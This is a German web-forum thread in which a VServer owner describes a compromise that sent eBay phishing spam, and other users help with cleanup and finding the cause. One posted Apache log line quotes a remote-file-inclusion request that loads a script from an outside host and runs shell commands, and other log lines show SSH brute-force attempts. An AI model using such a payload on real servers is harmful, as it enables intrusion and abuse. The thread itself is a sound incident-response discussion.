Server gehackt - verschickt spam

H

HonkXL

Registered User
Hallo,

mein VServer wurde wohl gehackt - und das obwohl aktuelle Updates drauf waren. Betriebssystem ist/war Suse 9

Mich würde interessieren was da los war. Wer kann mir weiterhelfen.

Hier die nötigen Infos:

chkrootkit lieferte das hier zurück:
Checking `bindshell'... INFECTED (PORTS: 31337)

unter /var/tmp gab es folgende Verzeichnisse / Dateien die nicht von mir stammten:
.hu (Dir)
.tmp (Dir)
sendcoante (Dir)
sendcoante.zip
kmod

In den Verzeichnissen sind zahlreiche Pearl-Scripte, die nichts anderes tun als massig Mails zu verschicken und einen Art Server-Task bilden. Ich habe die Dateien mal gesichert.

Verschickt wurden Mails die eine Anmeldung als EBay-Powerseller angaben und auf eine gefälschte EBay-Seite verwiesen.

Aktuell habe ich meinen VServer wieder so weit das er keinen Spam mehr verschickt.

Von Intergenia habe ich eine Mail bekommen das die Nutzung gegen die AGBs verstößt (ist ja logisch). Mein Transfervolumen in den letzten 2 Tagen lag gut 2 GB über normal.

Wie wäre jetzt ein sinnvolles Vorgehen?

Gruß
Thomas
 
Hallo!
- Sichere alle relaventen Benutzerdaten (Webs, Dateien die du kennst und wirklich brauchst, Datenbanken).
- Lad dir diese Dateien auf deinen heimischen PC. Mach einen Virenscan dieser Daten.
- Sichere sämtliche Logfiles des Servers.
- Google nach den Dateien im /tmp Verzeichnis.
- Reinitialisiere den Server.
- Finde heraus wie die Server gehacked wurde.
- Spiele keine Programme mit Sicherheitslücken auf den neu installierten Server.

Bei mir war es z.B. eine veraltete awstats Version.

mfG
Thorsten
 
Hi,

hab mir die Logs und alles gerade nochmal angeschaut. Im Quelltext von dem Zeugs wird auf:
http://www.terror.as.ro/
verwiesen.

In den Apache2-Logs finde ich sowas hier:
127.0.0.1 - - [21/Mar/2005:01:37:53 +0100] "GET ?name=http://www.terror.as.ro/sh.jpg%3f&cmd=id%3buname%2520-a%3bw HTTP/1.1" 403 1489 "-" "Linux"

Habe gerade mal die Datei messages geprüft:

per ssh wurde über längeren Zeitraum mit verschiedenen User-Namen ein Login versucht - der aber nie gelungen ist.
IP-Adresse war: 218.158.46.159 - die IP ist eingetragen auf:
descr: yulrinjeongbokisul
descr: yulrinjeongbokisul sangka 1cheung 615beonji naedong nonsansi
descr: CHUNGNAM
descr: 320-030
country: KR

Rechnerstandort ist Korea.

Außerdem steht das hier einige hundermale in der Log:

Mar 20 04:14:18 vs156150 sshd[15205]: reverse mapping checking getaddrinfo for 186.69-93-62.reverse.theplanet.com failed - POSSIBLE BREAKIN ATTEMPT!
Mar 20 04:14:18 vs156150 sshd[15205]: Failed password for nobody from 69.93.62.186 port 51811 ssh2
Mar 20 04:14:18 vs156150 sshd[15205]: Received disconnect from 69.93.62.186: 11: Bye Bye
Mar 20 04:14:19 vs156150 sshd[16994]: Illegal user patrick from 69.93.62.186
Mar 20 04:14:19 vs156150 sshd[16994]: input_userauth_request: illegal user patrick

Auch der Rechner ist in Korea daheim.

Nur wie bekomme ich jetzt raus wie das Ding auf den Server eingestiegen ist?

Gruß
Thomas
 
Last edited by a moderator:
Hi,

autsch - Volltreffer... Da war eine 2.0.11 drauf - und die Sicherheitslücken die die hat hab ich grad selber getestet... :-(

Gruß
Thomas
 
You must log in or register to reply here.
Back
Top